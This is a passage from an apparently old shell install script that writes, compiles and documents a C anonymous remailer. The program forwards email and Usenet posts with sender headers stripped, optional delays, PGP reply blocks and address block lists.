#define SENDMAIL \"$xsendmail\"

#define BLOCKFROM \"source.block\"
#define BLOCKTO \"dest.block\"
#define INQUEUE \"in.queue\"
#define OUTQUEUE \"out.queue\"
#define TEMPDIR \"temp\"
#define HELPFILE \"remailer-help\"
#define STATSDATA \"statsdata\"

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <sys/time.h> /* some os need this one also */
/*File io stuff:*/
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>


FILE *infile;
FILE *outfile;
FILE *tempfile;
FILE *file2;
char from[256]=\"\";
char from_address[256]=\"\";
char cutmarks[256]=\"\";
int anon_flag=0;
int help_flag=0;
int stat_flag=0;
int pgp_flag=0;
char replykey[80]=\"\";
char idbuf[17];
int idcount=0;
struct timeval tp;
unsigned long latime;
int blockflag;

void getfrom(char *input){
  int x=0,y=0;
  while(input[x]!=':'){x=x+1;}
  x=x+1;
  while(input[x]<=32){x=x+1;}
  while(input[x]>32){
    from_address[y]=input[x];
    x=x+1;y=y+1;
  }
  from_address[y]=0;
  x=0; /* look for <address> */
  while(input[x]>31&&input[x]!='<'){x=x+1;}
  if(input[x]=='<'){
    y=0;x=x+1;
    while(input[x]>32&&input[x]!='>'){
      from_address[y]=input[x];
      x=x+1;y=y+1;
    }
    from_address[y]=0;
  }
}

void block_addr(char address[],char *file) {
  char input[256];
  int match=0;
  int x,y,z;
  int exclude;

  FILE *killfile;

  chdir(DIR);
  if(killfile=fopen(file,\"r\")){
    while(fscanf(killfile,\"%s\",input)>0) {
      if (input[0]!='#'&&input[0]>32) {
        x=0;exclude=0;z=0;
        if (input[0]=='!') {exclude=1;z++;} 
	while(address[x]!=0) {
          y=0;
          while ((address[x+y]|32)==(input[y+z]|32)&&input[y+z]!='*'
              &&input[y+z]!=0&&address[x+y]!=0) {
            y++;
	  }
          if (input[y+z]==0) match=(1^exclude);
          if (input[y+z]=='*') {z=z+y+1;x=x+y;}
          else x++;
        }
      }
    }
    fclose(killfile);
  }
  if (match==1) address[0]=0;
}

int search(char str1[],char str2[]) {
  int x=0;
  int y=0;
  int match=0;

  while(str2[x]!=0) {
    y=0;
    while ((str2[x+y]==str1[y]||str2[x+y]==(str1[y]-32))&&str2[x+y]!=0) {
      y++;
      if (str1[y]==0) match=1;
    }
    x++;
  }
  return(match);
}

void scanline(char input[],char resend_address[]) {
  int x,y,z;
  int resend_flag=0;
  int cutmarks_flag=0;
  int post_flag=0;
  int latent_plusflag;
  int latent_randflag;
  int latent_h;
  int latent_m;
  int latent_s;

  /* Pass thru Subject, Content-Type, and In-Reply-To lines */
  if ((input[0]=='S'||input[0]=='s')&&input[1]=='u'&&input[2]=='b') {
     /* if the subject line is blank, drop it */
    if (input[8]!=0&&input[9]!=0) fprintf(outfile,\"%s\",input);
     /* and handle special case subjects for help and stats */
    if (search(\"remailer-stat\",input)) {
      latime=tp.tv_sec; /* No latency */
      stat_flag=1;
    }
    if (search(\"remailer-help\",input)||search(\"remailer-info\",input)) {
      latime=tp.tv_sec; /* No latency */
      help_flag=1;
    }
  }
  if ((input[0]=='C'||input[0]=='c')&&input[1]=='o'&&input[2]=='n') {
    fprintf(outfile,\"%s\",input);
  }
  if ((input[0]=='I'||input[0]=='i')&&input[1]=='n'&&input[2]=='-') {
    fprintf(outfile,\"%s\",input);
  }
  
  /* Save the from line in case non-anonymous posting is requested */
  if ((input[0]=='F'||input[0]=='f')&&input[1]=='r'&&input[2]=='o') {
    getfrom(input);block_addr(from_address,BLOCKFROM);
    if(from_address[0]==0) blockflag=1; /* Source block */
    block_addr(input,BLOCKTO);
    strcpy(from,input);
  }

/* Fuzzy Match headers */
  x=0;
  /* Remail-To? */
  while (input[x]!=0&&(input[x]!=32||x<=2)&&input[x]!=10&&x<256) {
    if (input[x]=='R'||input[x]=='r') {
      while (input[x]!=0&&input[x]!=32&&input[x]!=10&&x<256) {
        if (input[x]=='M'||input[x]=='m') {
          while (input[x]!=0&&input[x]!=10&&x<256) {
            if ((input[x]=='T'||input[x]=='t') &&
              (input[x+1]=='O'||input[x+1]=='o')) {
              while (input[x]!=0&&input[x]!=':'&&input[x]!=32
                     &&input[x]!=10&&x<256) x++;
              if (input[x]==':') {
                resend_flag=1;
                anon_flag=1;
                x=256;
              }
            } else x++;
          }
        } else x++;
      }
    } else x++;
  }

  /* Anon-To? */
  x=0;
  while (input[x]!=0&&(input[x]!=32||x<=2)&&input[x]!=10&&x<256) {
    if (input[x]=='A'||input[x]=='a') { x++;
      if (input[x]=='N'||input[x]=='n') {
        while (input[x]!=0&&input[x]!=10&&x<256) {
          if ((input[x]=='T'||input[x]=='t') &&
              (input[x+1]=='O'||input[x+1]=='o')) {
            while (input[x]!=0&&input[x]!=':'&&input[x]!=32
                   &&input[x]!=10&&x<256) x++;
            if (input[x]==':') {
              resend_flag=1;
              anon_flag=1;
            }
            x=256;
          } else x++;
        }
      }
    } else x++;
  }

  /* Post? */
  x=0;
  while (input[x]!=0&&input[x]!=32&&input[x]!=10&&x<256) {
    if (input[x]=='P'||input[x]=='p') { x++;
      if (input[x]=='O'||input[x]=='o') { x++;
        if (input[x]=='S'||input[x]=='s') {
          post_flag=1;
          /* Post-To ? */
          while (input[x]!=0&&input[x]!=32&&input[x]!=10&&x<256) {
            if (input[x]=='T'||input[x]=='t') { x++;
              if (input[x]=='O'||input[x]=='o') { x++;
                if (input[x]==':') {
                  resend_flag=1;
                }
              }
            } else x++;
          }
          x=256;
        }
      }
    } else x++;
  }

  /* soda.berkeley style Send-To ? */
  x=0;
  while (input[x]!=0&&input[x]!=32&&input[x]!=10&&x<256) {
    if (input[x]=='S'||input[x]=='s') { x++;
      if (input[x]=='E'||input[x]=='e') { x++;
        if (input[x]=='N'||input[x]=='n') { x++;
          if (input[x]=='D'||input[x]=='d') {
            while (input[x]!=0&&input[x]!=32&&input[x]!=10&&x<256) {
              if (input[x]=='T'||input[x]=='t') { x++;
                if (input[x]=='O'||input[x]=='o') { x++;
                  if (input[x]==':') resend_flag=1;
                }
              } else x++;
            }
          }
        }
      }
    } else x++;
  }

/* Check for PGP...   I got a little sloppy here...ohwell*/
  if(input[0]=='E'&&input[1]=='n'&&input[2]=='c'
     &&input[3]=='r'&&input[4]=='y'&&input[5]=='p'
     &&input[6]=='t'&&input[7]=='e'&&input[8]=='d') {
    resend_flag=0;
    pgp_flag=1;
  }
  if(input[0]=='E'&&input[1]=='n'&&input[2]=='c'
     &&input[3]=='r'&&input[4]=='y'&&input[5]=='p'
     &&input[6]=='t'&&input[7]=='-') {
    x=0;y=0;
    while(input[x]!=':'){x=x+1;}
    x=x+1;
    if(input[x]==32){x=x+1;}
    z=x;
    while(input[x]>32){
      replykey[y]=input[x];
      x=x+1;y=y+1;
    }
    replykey[y]=0;
  
  }
  if(input[0]=='C'&&input[1]=='u'&&input[2]=='t') {
    cutmarks_flag=1;
  }

  if(resend_flag){
    x=2;y=0; /* x=2 in case Extropians-style ::Header */
    while(input[x]!=':'){x=x+1;}
    x=x+1;
    while(input[x]<=32){x=x+1;}
    z=x;
    if (post_flag==0) {
      while(input[x]>32){
        resend_address[y]=input[x];
        x=x+1;y=y+1;
      }
      resend_address[y]=0;
      x=0; /* look for <address> */
      while(input[x]>31&&input[x]!='<'){x=x+1;}
      if(input[x]=='<'){
        y=0;x=x+1;
        while(input[x]>32&&input[x]!='>'){
          resend_address[y]=input[x];
          x=x+1;y=y+1;
        }
        resend_address[y]=0;
      }
      /* Print out new To: line */
      fprintf(outfile,\"To: \");
      while(input[z]>0){
        fprintf(outfile,\"%c\",input[z]);
        z=z+1;
      }
      block_addr(resend_address,BLOCKTO);
    }
    if (post_flag) {
      fprintf(outfile,\"Newsgroups: \");
      while(input[z]>0){
        fprintf(outfile,\"%c\",input[z]);
        z=z+1;
      }
      resend_address[0]='p';
      resend_address[1]='o';
      resend_address[2]='s';
      resend_address[3]='t';
      resend_address[4]=0;
      block_addr(input,BLOCKTO);if (input[0]==0) resend_address[0]=0;
    }
  }

  if(cutmarks_flag){
    x=0;y=0;
    while(input[x]!=':'){x=x+1;}
    x=x+1;
    if(input[x]==32){x=x+1;}
    z=x;
    while(input[x]>32){
      cutmarks[y]=input[x];
      x=x+1;y=y+1;
    }
    cutmarks[y]=0;
  }

  if((input[0]|32)=='l'&&(input[1]|32)=='a'&&(input[2]|32)=='t') {
    x=0;
    while(input[x]!=':'){x=x+1;}
    x=x+1;
    if(input[x]==32){x=x+1;}

    latent_plusflag=0;latent_randflag=0;
    latent_h=0;latent_m=0;latent_s=0;

    while((input[x]<'0'||input[x]>'9')&&input[x]>=32) {
      if (input[x]=='+') latent_plusflag=1;
      if ((input[x]=='r')||(input[x]=='R')) latent_randflag=1;
      x++;
    }
    while (input[x]>='0'&&input[x]<='9') {
      latent_h=(latent_h*10)+(input[x]-48);
      x++;
    }
    if(input[x]==':') {
      x++;
      while (input[x]>='0'&&input[x]<='9') {
        latent_m=(latent_m*10)+(input[x]-48);
        x++;
      }
      if(input[x]==':') {
        x++;
        while (input[x]>='0'&&input[x]<='9') {
          latent_s=(latent_s*10)+(input[x]-48);
          x++;
        }
      }
    }
    while(input[x]>=32) {
      if (input[x]=='+') latent_plusflag=1;
      if ((input[x]=='r')||(input[x]=='R')) latent_randflag=1;
      x++;
    }

    latime=(latent_h*3600+latent_m*60+latent_s);

    if(latent_plusflag==0) {
      /* Not Supported - Is this really necessary? */
    }

    if(latent_randflag&&(latime>1)) {
      /* Simple randomizer */
      latime=abs((tp.tv_sec^latime)+tp.tv_usec+(getpid()*latime))%(latime+1);
    }

    latime+=tp.tv_sec;
  }
}

char* genid() { /* Generate ascii id from process id and time with shuffle */
  unsigned long int id1,id2;
  int x=0;
  
  id1=getpid()|(idcount<<16);
  id2=tp.tv_sec;
  idcount++;
  
  for(x=32;x--;){
    id1+=1234567890;
    id1^=0xABCDEF12;
    id1=(id1<<1)|(id1>>31);
    id2^=id1;
    id2+=0x12345678;
    id2^=0x9ABCDEF0;
    id2=(id2<<31)|(id2>>1);
    id1^=id2;
  }
  for(x=0;x<8;x++) {
    idbuf[x]=65+(id1&15);
    id1=id1>>4;
  }
  for(x=8;x<16;x++) {
    idbuf[x]=65+(id2&15);
    id2=id2>>4;
  }
  idbuf[16]=0;
  return(idbuf);
}

/* Re-encrypt messages for use with reply-blocks */
void reencrypt(){
  char input[256];
  int pipefd[2];
  int pipe2fd[2];

  input[255]=0;
  pipe(pipefd);
  pipe(pipe2fd);
  if(!fork()) {
    dup2(pipefd[0],0);
    dup2(pipe2fd[1],1);
    close(pipefd[1]);
    close(pipe2fd[0]);
    chdir(DIR);
    execl(PGP,\"pgp\",\"-fcta\",\"+BATCHMODE\",\"+ARMORLINES=0\",\"-z\",replykey,(char *)0);
  }
  close(pipefd[0]);close(pipe2fd[1]);
  file2=fdopen(pipefd[1],\"w\");
  while(fgets(input,255,infile)) {
    fprintf(file2,\"%s\",input);
  }
  fclose(file2);
  file2=fdopen(pipe2fd[0],\"r\");
  while(fgets(input,255,file2)) {
    fprintf(outfile,\"%s\",input);
  }
  fclose(file2);
}

void updatestats(int inccnt,int incpgp,int inclat,int incpost) {
  int m[24];
  int ccm=0;
  int p[24];
  int ccpgp=0;
  int l[24];
  int ccl=0;
  int u[24];
  int ccnews=0;
  char month[24][5];
  int date[24];
  int hour=0;
  int currenthour;
  FILE *datafile;
  int x;
  int y;
  struct tm *timestr;

  timestr=localtime(&(tp.tv_sec));

  if(datafile=fopen(STATSDATA,\"r\")){
    fscanf(datafile,\"%d\",&hour);
    fscanf(datafile,\"%d %d %d %d\",&ccm,&ccpgp,&ccl,&ccnews);
    for(x=0;x<24;x++) {
      fscanf(datafile,\"%s %d %d %d %d %d\",
             month[x],&date[x],&m[x],&p[x],&l[x],&u[x]); }
    fclose(datafile);
  }else{
    for(x=0;x<24;x++) {
      strcpy(month[x],\"---\");
      date[x]=0;m[x]=0;p[x]=0;l[x]=0;u[x]=0;
    }
  }
  currenthour=(*timestr).tm_hour;
  x=hour%24;
  while (x!=currenthour) {
    if (x>0) {
      strcpy(month[x],month[x-1]);
      date[x]=date[x-1];
    }else{
      if((*timestr).tm_mon==0) strcpy(month[0],\"Jan\");
      if((*timestr).tm_mon==1) strcpy(month[0],\"Feb\");
      if((*timestr).tm_mon==2) strcpy(month[0],\"Mar\");
      if((*timestr).tm_mon==3) strcpy(month[0],\"Apr\");
      if((*timestr).tm_mon==4) strcpy(month[0],\"May\");
      if((*timestr).tm_mon==5) strcpy(month[0],\"Jun\");
      if((*timestr).tm_mon==6) strcpy(month[0],\"Jul\");
      if((*timestr).tm_mon==7) strcpy(month[0],\"Aug\");
      if((*timestr).tm_mon==8) strcpy(month[0],\"Sep\");
      if((*timestr).tm_mon==9) strcpy(month[0],\"Oct\");
      if((*timestr).tm_mon==10) strcpy(month[0],\"Nov\");
      if((*timestr).tm_mon==11) strcpy(month[0],\"Dec\");
      date[0]=(*timestr).tm_mday;
    }
    m[x]=0;
    p[x]=0;
    l[x]=0;
    u[x]=0;
    x++;if (x>23) x=0;
  }

  if (hour!=currenthour) {
    m[hour]=ccm;
    p[hour]=ccpgp;
    l[hour]=ccl;
    u[hour]=ccnews;
    ccm=0;
    ccpgp=0;
    ccl=0;
    ccnews=0;
  }

  ccm+=inccnt;
  ccpgp+=incpgp;
  ccl+=inclat;
  ccnews+=incpost;

  if(datafile=fopen(STATSDATA,\"w\")){
    fprintf(datafile,\"%d\\n\",currenthour);
    fprintf(datafile,\"%d %d %d %d\\n\",ccm,ccpgp,ccl,ccnews);
    for(x=0;x<24;x++) {
      fprintf(datafile,\"%s %d %d %d %d %d\\n\",
              month[x],date[x],m[x],p[x],l[x],u[x]);
    }
    fclose(datafile);
  } else fprintf(stderr,\"remailer: can't write file %s\\n\",STATSDATA);
}

void viewstats() {
  int m[24];
  int ccm;
  int p[24];
  int ccpgp;
  int l[24];
  int ccl;
  int u[24];
  int ccnews;
  char month[24][5];
  int date[24];
  int hour;
  int currenthour;
  FILE *datafile;
  int x;
  int y;

  datafile=fopen(STATSDATA,\"r\");

  fscanf(datafile,\"%d\",&hour);
  fscanf(datafile,\"%d %d %d %d\",&ccm,&ccpgp,&ccl,&ccnews);
  for(x=0;x<24;x++) {
    fscanf(datafile,\"%s %d %d %d %d %d\",
           month[x],&date[x],&m[x],&p[x],&l[x],&u[x]); }
  fclose(datafile);

  fprintf(outfile,\"Subject: Re: Remailer Statistics\\n\");
  fprintf(outfile,\"\\n\");
  fprintf(outfile,\"Statistics for last 24 hours from anonymous remailer at\\n\");
  fprintf(outfile,\"e-mail address: %s\\n\",REMAILERADDRESS);
  fprintf(outfile,\"\\n\");
  fprintf(outfile,
    \"Number of messages per hour from %s %d %d:00 to %s %d %d:59\\n\",
    month[23],date[23],hour,month[0],date[0],(hour+23)%24);
  fprintf(outfile,\"\\n\");
  for(x=0;x<24;x++) {
    fprintf(outfile,\" %2d:00 (%2d) \",x,m[x]);
    if (m[x]>0) {
      y=0;while((y<m[x])&&(y<66)) {
        fprintf(outfile,\"*\");
        y++;
      }
      ccm+=m[x];
      ccpgp+=p[x];
      ccl+=l[x];
      ccnews+=u[x];
    }
    fprintf(outfile,\"\\n\");
  }
  fprintf(outfile,\"\\n\");
  fprintf(outfile,\"Total messages remailed in last 24 hours: %d\\n\",ccm);
#ifdef PGP
  fprintf(outfile,\"Number of messages encrypted with PGP: %d\\n\",ccpgp);
#endif
  fprintf(outfile,\"Number of messages queued with latency: %d\\n\",ccl);
#ifdef INEWS
  fprintf(outfile,\"Number of posts to usenet: %d\\n\",ccnews);
#endif
}

void main(int argc,char *argv[]) {
  char input[256];
  char resend_address[256]=\"\";
  int stop;
  int x;
  pid_t mypid,otherpid;
  char filename[256];
  char filename2[256];
  int pipefd[2];
  int pipe2fd[2];
  char envstr[256];

  gettimeofday(&tp,0);
  if(chdir(DIR))
   {fprintf(stderr,\"remailer: Fatal Error: can't chdir to %s\\n\",DIR);exit(1);}
  mkdir(INQUEUE,0700); /* Create it if it doesn't exist */
  mkdir(TEMPDIR,0700); /* And the temp dir */  
  /* Create a temporary file in TEMPDIR */
  strcpy(filename,TEMPDIR);
  strcat(filename,\"/\");
  strcat(filename,genid());
  if((outfile=fopen(filename,\"w\"))==0){
    fprintf(stderr,\"remailer: Fatal Error: can't create temporary file\\n\");
    exit(1);
  }
  while(fgets(input,255,stdin)) fprintf(outfile,\"%s\",input);
  fclose(outfile);
  strcpy(filename2,INQUEUE);
  strcat(filename2,\"/\");
  strcat(filename2,genid());
  if(rename(filename,filename2)){
    fprintf(stderr,\"remailer: Fatal Error: can't move %s to %s\\n\",
      filename,filename2);
    exit(1);
  }

  mypid=getpid();otherpid=0;
  if(infile=fopen(\"pid\",\"rb\")) {
    fread(&otherpid,sizeof(pid_t),1,infile);
    fclose(infile);
  }
  /* If there is a remailer process already running, leave the message
     in in.queue and exit */
  if(otherpid) {
    if(kill(otherpid,SIGCONT)==0) exit(0); }
  if(outfile=fopen(\"pid\",\"wb\")) {
    fwrite(&mypid,sizeof(pid_t),1,outfile);
    fclose(outfile);
  } else fprintf(stderr,\"remailer: can't write pid file\\n\");

in_loop:

  /* Open an input file from in.queue */
  chdir(DIR);chdir(INQUEUE);
  pipe(pipefd);
  filename[0]=0;
  if(!fork()) {
    dup2(pipefd[1],1);
    close(pipefd[0]);
    execl(LS,\"ls\",\"-1\",(char *)0);
  }
  x=0;close(pipefd[1]);
  infile=fdopen(pipefd[0],\"r\");
  while(fgets(filename,256,infile)) x++;
  fclose(infile);
  if(filename[0]==0) exit(0);
#ifdef SPAM_THRESHOLD
  if(x>SPAM_THRESHOLD) exit(0);
#endif
  for(x=0;filename[x]>32;x++){} filename[x]=0;
  if(!(infile=fopen(filename,\"r\"))){}
  
  /* Open the output file */
  chdir(DIR);
  mkdir(OUTQUEUE,0700); /* Create it if it doesn't exist */
  if(chdir(OUTQUEUE))
    {fprintf(stderr,\"remailer: Error - can't chdir to %s\\n\",OUTQUEUE);exit(1);}
  if(!(outfile=fopen(filename,\"w\")))
    {fprintf(stderr,\"remailer: can't write output file, message left in %s\\n\",INQUEUE);exit(1);}

  /* Create blank space for fields in output file */
  latime=0;resend_address[0]=0;resend_address[255]=0;
  fwrite(&latime,sizeof(long),1,outfile);
  fwrite(resend_address,256,1,outfile);

  /* Initialize latency time & misc */
  latime=tp.tv_sec;
  from[0]=0;cutmarks[0]=0;replykey[0]=0;
  anon_flag=0;help_flag=0;stat_flag=0;pgp_flag=0;blockflag=0;

#ifdef DEFAULT_LATENCY
  /* Randomly reorder messages if DEFAULT_LATENCY is set */
  if(DEFAULT_LATENCY>1) {
    latime=tp.tv_sec+abs(tp.tv_sec+tp.tv_usec+getpid())%(DEFAULT_LATENCY+1);
  }
#endif

  /* Scan headers */
  fgets(input,255,infile);
  while(input[0]!=10) {
    scanline(input,resend_address);
    input[0]=10;input[1]=0;
    fgets(input,255,infile);
  }
  fgets(input,255,infile); /* end of headers, skip a line */
  
  /* if first line is blank, skip it and look for a :: on the next line */
  if(resend_address[0]==0&&input[0]<32) fgets(input,255,infile);
  /* Also skip \"blank\" lines with a space in them: */
  if(resend_address[0]==0){
    for(x=0;(input[x]<=32)&&(input[x]);x++){}
    if(input[x]==0) fgets(input,255,infile);
  }

  /* Scan :: headers, if applicable */
  if(input[0]==':'&&input[1]==':') {
    while(input[0]!=10) {
      scanline(input,resend_address);
      input[0]=10;input[1]=0;
      fgets(input,255,infile);
    }
    fgets(input,255,infile);
  }

  /* or scan for headers anyway for idiots who forget the double colon */
  if(resend_address[0]==0) {
    scanline(input,resend_address);
    if(resend_address[0]!=0) {
      fgets(input,255,infile);
      while(input[0]!=10) {
        scanline(input,resend_address);
        input[0]=10;input[1]=0;
        fgets(input,255,infile);
      }
    }
    fgets(input,255,infile);
  }

  /* Exec PGP? */
  if (pgp_flag) {
    fclose(outfile);
    chdir(DIR);chdir(OUTQUEUE);
    unlink(filename);
    pipe(pipefd);
    pipe(pipe2fd);
    if(!fork()) {
      dup2(pipefd[0],0);
      dup2(pipe2fd[1],1);
      close(pipefd[1]);
      close(pipe2fd[0]);
      chdir(DIR);
#ifdef PGPPATH
      strcpy(envstr,\"PGPPATH=\");
      strcat(envstr,PGPPATH);
      putenv(envstr);
#endif
      execl(PGP,\"pgp\",\"-f\",\"-z\",PGPPASS,(char *)0);
    }
    close(pipefd[0]);close(pipe2fd[1]);
    fseek(infile,0,0);
    outfile=fdopen(pipefd[1],\"w\");
    while((fgets(input,255,infile)>0)
         &&(strcmp(input,\"-----BEGIN PGP MESSAGE-----\\n\")!=0)) {}
    fprintf(outfile,\"%s\",input);
    while(fgets(input,255,infile)
         &&(strcmp(input,\"-----END PGP MESSAGE-----\\n\")!=0)) {
      fprintf(outfile,\"%s\",input);
    }
    fprintf(outfile,\"%s\",input);
    fclose(outfile);
    file2=fdopen(pipe2fd[0],\"r\");
    chdir(DIR);chdir(INQUEUE);
    outfile=fopen(genid(),\"w\");
    fprintf(outfile,\"\\n\");
    while(fgets(input,255,file2)) {
      fprintf(outfile,\"%s\",input);
    }
    fclose(file2);
    /* Append rest of message to decrypted reply-block */
    while(fgets(input,255,infile)) {
      fprintf(outfile,\"%s\",input);
    }
    fclose(infile);fclose(outfile);
    unlink(filename);/* Remove the original message from in.queue */
    chdir(DIR);
    updatestats(0,1,0,0);
    goto in_loop;
  }

  if (from[0]==0) anon_flag=1;

  if (anon_flag) {
    fprintf(outfile,ANONFROM);
    fprintf(outfile,DISCLAIMER);
  }else{
    fprintf(outfile,\"%s\",from);
    fprintf(outfile,NONANONDISC);
  }

  /* Paste in ## headers if present */
  if(input[0]=='#'&&input[1]=='#') {
   /* Kill Reply-To lines with blocked addresses to prevent
      mailbombs via alt.test */
    while(fgets(input,255,infile)>0&&input[0]>31) {
      if ((input[0]=='R'||input[0]=='r')&&input[1]=='e'&&input[2]=='p') {
        block_addr(input,BLOCKTO);if (input[0]!=0) fprintf(outfile,\"%s\",input);
      /* Block ## pasted Newsgroups: */
      }else if((input[0]|32=='n')&&input[1]=='e'&&input[2]=='w'&&input[3]=='s')
      {
        block_addr(input,BLOCKTO);if (input[0]!=0) fprintf(outfile,\"%s\",input);
      }else fprintf(outfile,\"%s\",input);
    }
    fprintf(outfile,\"\\n\");
  }else{
    fprintf(outfile,\"\\n%s\",input);
    if(replykey[0]>0&&input[0]=='*'&&input[1]=='*') {
      reencrypt();
    }
  }

  /* Copy message */
  stop=0;
  while(fgets(input,255,infile)>0&&(!stop)) {
    if (cutmarks[0]!=0) {
      x=0;
      while(cutmarks[x]==input[x]&&input[x]!=0&&cutmarks[x]!=0) {
        x++;
      }
      if (cutmarks[x]==0) stop=1;
    }
    if (!stop) fprintf(outfile,\"%s\",input);
    if(replykey[0]>0&&input[0]=='*'&&input[1]=='*') {
      reencrypt();
    }
  }
  
  /* If help or stats were requested, set destination address to reply
     to sender */
  if((resend_address[0]==0)&&(help_flag||stat_flag)){
    strcpy(resend_address,from_address);
  } else {help_flag=0;stat_flag=0;}

  /* Save time and destination address in binary data table at
     begining of file */
  if (blockflag) resend_address[0]=0;
  fseek(outfile,0,0);
  fwrite(&latime,sizeof(long),1,outfile);
  fwrite(resend_address,256,1,outfile);
  if(help_flag||stat_flag){
    chdir(DIR);
    fprintf(outfile,\"%s\",REMAILERFROM);
    if(help_flag) {
      if(file2=fopen(HELPFILE,\"r\")){
        while(fgets(input,255,file2)){
          for(x=0;input[x];x++){
            if(input[x]=='['&&input[x+1]=='a'&&input[x+2]=='d'
               &&input[x+3]=='d'&&input[x+4]=='r'&&input[x+5]==']')
            {
              fprintf(outfile,\"%s\",REMAILERADDRESS);x=x+5;
            }
            else
            {
              fprintf(outfile,\"%c\",input[x]);
            }   
          }
        }
        fclose(file2);
      } else resend_address[0]=0;
    }
    if(stat_flag) {viewstats();}
  }
  fclose(outfile);

  chdir(DIR);chdir(INQUEUE);

  /* Second message?  Put message following cutmarks into inqueue */
  if (stop==1&&input[0]==':'&&input[1]==':') {
    outfile=fopen(genid(),\"w\");
    fprintf(outfile,\"\\n::\\n\");
    while(fgets(input,255,infile)>0) {
      fprintf(outfile,\"%s\",input);
    }
    fclose(outfile);
  }

  /* Write non-remailer messages into operator's mailbox */
  if (resend_address[0]==0&&from[0]!=0){
    fseek(infile,0,0);
    outfile=fopen(SPOOL,\"a\");
    while(fgets(input,255,infile)) {
      fprintf(outfile,\"%s\",input);
    }
    fclose(infile);
    fprintf(outfile,\"\\n\");
    fclose(outfile);
    unlink(filename);
    chdir(DIR);chdir(OUTQUEUE);
    unlink(filename);
  }else{
    fclose(infile);
    unlink(filename);
    if(strcmp(resend_address,\"null\")==0
     ||strcmp(resend_address,\"/dev/null\")==0) resend_address[0]=0;
    if(resend_address[0]==0){ /* drop empty messages */
      chdir(DIR);chdir(OUTQUEUE);
      unlink(filename);
    }else{
      chdir(DIR);
      if((latime-tp.tv_sec)>2) updatestats(0,0,1,0);
      updatestats(1,0,0,0); /* Add one remailed message to stats */
    }
  }

  /* Deliver messages in out.queue */
  gettimeofday(&tp,0);
  chdir(DIR);chdir(OUTQUEUE);
  pipe(pipefd);
  filename[0]=0;
  if(!fork()) {
    dup2(pipefd[1],1);
    close(pipefd[0]);
    execl(LS,\"ls\",\"-1\",(char *)0);
  }
  x=0;close(pipefd[1]);
  file2=fdopen(pipefd[0],\"r\");
  while(fgets(filename,256,file2)&&filename[0]!=0) {
    for(x=0;filename[x]>32;x++){} filename[x]=0;
    if(infile=fopen(filename,\"r\")){
      fread(&latime,sizeof(long),1,infile);
      fread(resend_address,256,1,infile);
      if (latime<=tp.tv_sec) {
        pipe(pipe2fd);/*pipe(pipe3fd);*/
        if(!fork()) {
          /*Child*/
          dup2(pipe2fd[0],0);close(pipe2fd[1]);
          /*dup2(pipe3fd[1],1);close(pipe3fd[0]);*/
          if(strcmp(resend_address,\"post\")){
            execl(SENDMAIL,SENDMAIL,
#ifdef RETURN
                                    \"-f\",RETURN,
#endif
                                                resend_address,(char *)0);
            exit(0);
          }else{
#ifdef INEWS
#ifdef NNTPSERVER
            strcpy(envstr,\"NNTPSERVER=\");
            strcat(envstr,NNTPSERVER);
            putenv(envstr);
#endif
            execl(INEWS,\"inews\",\"-h\",(char *)0);
#endif
            exit(0);
          }
        }else{
          /*Parent*/
          close(pipe2fd[0]);/*close(pipe3fd[1]);*/
          outfile=fdopen(pipe2fd[1],\"w\");
          if(strcmp(resend_address,\"post\")){
            /* We are talking to sendmail */
            while(fgets(input,255,infile)>0) {
              fprintf(outfile,\"%s\",input);
            }
            fclose(outfile);
            /* At this point, it's a safe bet that sendmail will deliver
               the message, so the remailer can delete its copy.  If
               sendmail execution had failed for some reason, this
               process would have been killed by a SIGPIPE */
            unlink(filename);
          }else{
            /* We are talking to inews */
#ifdef INEWS
            while(fgets(input,255,infile)>0) {
              fprintf(outfile,\"%s\",input);
            }
            /* There should be a way to analyze the response from inews
               and requeue messages that could not be posted due to server
               failure.  Now, the messages just get deleted :( */
            unlink(filename);
#else
            /* If posting is not allowed, delete the failed message */
            unlink(filename);
#endif
          }
        }
#ifdef WAIT_SEC
        sleep(WAIT_SEC);
#endif
        gettimeofday(&tp,0);
      }
      fclose(infile);
    }
  }
  fclose(file2);

  goto in_loop;
}
" | tee -a remailer.c > /dev/null
echo "Spawning compile in background."
gcc -o RM remailer.c 2> /dev/null &
echo "Building help-file."
echo "
Subject: Instructions for using anonymous remailer

This message is being sent to you automatically in response to the message
you sent to $xaddr with subject \"remailer-help\".

I have an automated mail handling program installed here which will take
any message with the proper headers and automatically re-send it anonymously.
You can use this by sending a message to $xaddr, with the
header Anon-To: containing the address that you want to send anonymously to.
(Only one recipient address is permitted.)  If you can't add headers to your
mail, you can place two colons on the first line of your message, followed
by the Anon-To line.  Follow that with a blank line, and then begin your
message.  For Example:

> From: joe@site.com
> To: $xaddr
> Subject: Anonymous Mail
>
> ::
> Anon-To: beth@univ.edu
>
> This is some anonymous mail.

The above would be delivered to beth@univ.edu anonymously.  All headers in
the original message are removed, with the exception of the Subject (and
Content-Type, if present).  She would not know that it came from Joe, nor
would she be able to reply to the message.

However, if Beth suspected that Joe had sent the message, she could compare
the time that the message was received with the times that Joe was logged
in.  However, this problem can be avoided by instructing the remailer to
delay the message, by using the Latent-Time header:

> From: joe@site.com
> To: $xaddr
> Subject: Anonymous Mail
>
> ::
> Anon-To: beth@univ.edu
> Latent-Time: +1:00
>
> This is some anonymous mail.

The above message would be delayed one hour from when it is sent.  It is also
possible to create a random delay by adding an r to the time (ie +1:00r),
which would have the message be delivered at a random time, but not more
than an hour.

Another problem is that some mailers automatically insert a signature file.
Of course, this usually contains the senders email address, and so would
reveal their identity.  The remailer software can be instructed to remove
a signature file with the header \"Cutmarks\".  Any line beginning with the
same text at in the cutmarks header, and any lines following it will be
removed.

> From: sender@origin.com
> To: $xaddr
> Subject: Anonymous Mail
>
> ::
> Anon-To: recipient@destination.com
> Cutmarks: --
>
> This line of text will be in the anonymous message.
> --
> This line of text will not be in the anonymous message.

The remailer can also be used to make posts to usenet.  To do this, use
Anon-Post-To.  Non-Anonymous posts can be made by using Post-To.

> From: poster@origin.com
> To: $xaddr
> Subject: Anonymous Post
>
> ::
> Anon-Post-To: alt.test
>
> This is an anonymous message

When posting test messages, please use the appropriate newsgroups (alt.test,
misc.test).

You can add additional headers to the output message by preceeding them
with ##

> From: chris@nifty.org
> To: $xaddr
> Subject: Nifty Anon Msg
>
> ::
> Anon-To: andrew@hell.edu
>
> ##
> Reply-To: acs-314159@chop.ucsd.edu
>
> A Message with a reply address.

By seperating messages with cutmarks, you can send more than one message
at once:

> From: me@mysite
> To: $xaddr
> Subject: message 1
>
> ::
